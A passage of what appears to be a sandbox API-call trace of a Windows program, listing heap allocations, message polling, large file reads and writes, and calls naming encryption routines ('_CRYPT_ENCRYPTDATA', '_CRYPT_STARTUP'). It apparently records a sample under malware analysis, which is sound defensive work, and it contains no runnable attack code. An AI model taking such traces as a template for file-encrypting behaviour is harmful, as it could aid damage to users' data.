hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.280] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0208.294] TranslateMessage (lpMsg=0x8cf708) returned 0 [0208.295] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0208.295] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0208.295] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0208.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0208.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0208.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0208.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0208.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0208.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0208.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0208.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0208.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0208.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0208.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0208.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf6e020 [0208.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0208.423] WriteFile (in: hFile=0x2d0, lpBuffer=0xf6e020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf6e020*, lpNumberOfBytesWritten=0x8cf5e4*=0x100000, lpOverlapped=0x0) returned 1 [0208.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0208.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6e020 | out: hHeap=0x970000) returned 1 [0208.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0208.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0208.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0208.546] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0208.546] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0208.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0208.546] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0208.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0208.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0208.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0208.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0208.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0208.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0208.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0208.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0208.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0208.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0208.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0208.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0208.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf6d020 [0208.551] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0208.567] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x3f94, lpOverlapped=0x0) returned 1 [0208.638] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0208.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0208.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0208.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0208.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f94) returned 0x2f24018 [0208.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6d020 | out: hHeap=0x970000) returned 1 [0208.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0208.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0208.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0208.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0x970000) returned 1 [0208.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0208.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0208.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f94) returned 0x2f37fb8 [0208.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0208.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0208.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0208.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0208.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0208.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0208.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0208.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f94) returned 0x2f24018 [0208.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0208.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0208.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0208.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0208.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0208.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0208.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0208.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0208.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0208.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0208.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0208.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0208.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0208.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0208.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0208.658] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0208.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0208.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0208.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0208.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0208.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0208.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0208.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0208.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0208.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f94) returned 0x2f24018 [0208.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0208.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0208.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0208.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0208.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0208.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0208.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0208.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0208.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0208.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0208.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0208.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0208.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0208.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0208.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0208.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f94) returned 0x2e80330 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0208.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0208.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0208.699] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0208.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.699] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0208.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0208.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0208.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0208.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0208.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0208.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0208.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0208.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0208.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0208.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0208.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0208.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0208.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0208.701] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0208.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0208.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0208.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0208.702] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0208.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0208.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0208.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0208.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0208.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0208.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0208.702] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0208.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0208.703] HeapFree (in: 